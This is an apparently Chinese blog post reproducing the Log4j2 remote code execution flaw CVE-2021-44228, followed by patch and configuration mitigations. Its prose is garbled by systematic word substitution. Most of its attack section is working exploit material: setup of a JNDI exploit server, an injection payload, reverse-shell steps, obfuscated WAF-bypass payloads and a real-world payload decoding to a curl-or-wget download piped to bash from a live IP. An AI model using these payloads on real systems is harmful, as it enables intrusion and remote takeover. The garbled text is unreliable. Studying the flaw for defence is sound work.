破绽描绘
Apache Log4j2是一款优秀的Java日志框架。近日,破绽银行平安团队留意到了Apache Log4j2远程代码执行破绽。由于Apache Log4j2某些功用存在递归解析功用,攻击者可直接结构歹意恳求,触发远程代码执行破绽。破绽应用无需特殊配置,经破绽银行平安团队考证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。破绽银行提示 Apache Log4j2 用户尽快采取平安措施阻止破绽攻击。CVE-2021-44228
影响版本
Apache Log4j 2.x <= 2.14.1
破绽复现
https://github.com/tangxiaofeng7/apache-log4j-poc
![图片[1]-Apache Log4j2远程代码执行漏洞CVE-2021-44228-孤勇者社区](http://www.gyzsq.com/wp-content/uploads/2022/04/20220422204909-626314c5e651a.png)
搭建JNDI效劳器
1、下载github上的JNDI
git clone https://github.com/welk1n/JNDI-Injection-Exploit.git2、装置maven(ubuntu16.04)
apt install maven3、编译JNDI
mvn clean compile
mvn clean package4、执行JNDI
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "command" -A 本机IP
5、判别目的jdk
猜想目的jdk为1.8以上
运用1.8以上的ldap效劳
![图片[2]-Apache Log4j2远程代码执行漏洞CVE-2021-44228-孤勇者社区](http://www.gyzsq.com/wp-content/uploads/2022/04/20220422204913-626314c9cac1e.png)
执行payload
1、执行payload(来源github)
${jndi:ldap://ip:port/xxx}写入觉得跟log4j组件日志记载有交互的输入框或者参数,然后恳求
![图片[3]-Apache Log4j2远程代码执行漏洞CVE-2021-44228-孤勇者社区](http://www.gyzsq.com/wp-content/uploads/2022/04/20220422204913-626314c9e932a.png)
2、查看ldap效劳器,的确有恳求,阐明存在反序列化破绽
![图片[4]-Apache Log4j2远程代码执行漏洞CVE-2021-44228-孤勇者社区](http://www.gyzsq.com/wp-content/uploads/2022/04/20220422204914-626314ca2765c.png)
3、反弹效劳器返回bashshell
![图片[5]-Apache Log4j2远程代码执行漏洞CVE-2021-44228-孤勇者社区](http://www.gyzsq.com/wp-content/uploads/2022/04/20220422204914-626314ca44e66.png)
绕过rc1
例如:
${jndi:ldap://127.0.0.1:1389/ badClassName}
绕过WAF
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}参考
${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
Decoded:
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
wget http://62.210.130.250/lh.sh;chmod +x lh[.]sh;./lh.sh
http://62.210.130.250/lh.sh
修复倡议
1、目前官方已发布测试版本修复该破绽,受影响用户可先将Apache Log4j2一切相关应用到最新的 log4j-2.15.0-rc1 版本,地址:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1(注:由于此版本非正式发行版,可能呈现不稳定的状况,倡议用户在备份数据后再停止晋级。)
2、晋级供给链中已知受影响的应用及组件:Apache Solr、Apache Flink、Apache Druid、srping-boot-strater-log4j2
暂时处理计划
1)设置jvm参数 “-Dlog4j2.formatMsgNoLookups=true”
![图片[6]-Apache Log4j2远程代码执行漏洞CVE-2021-44228-孤勇者社区](http://www.gyzsq.com/wp-content/uploads/2022/04/20220422204914-626314ca6d1fa.png)
2)设置“log4j2.formatMsgNoLookups=True”
3)系统环境变量“FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS”设置为“true”
![图片[7]-Apache Log4j2远程代码执行漏洞CVE-2021-44228-孤勇者社区](http://www.gyzsq.com/wp-content/uploads/2022/04/20220422204914-626314ca89d58.png)
4)倡议JDK运用11.0.1、8u191、7u201、6u211及以上的高版本
5)关闭对应应用的网络外连,制止主动外连
感谢您的来访,获取更多精彩文章请收藏本站。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
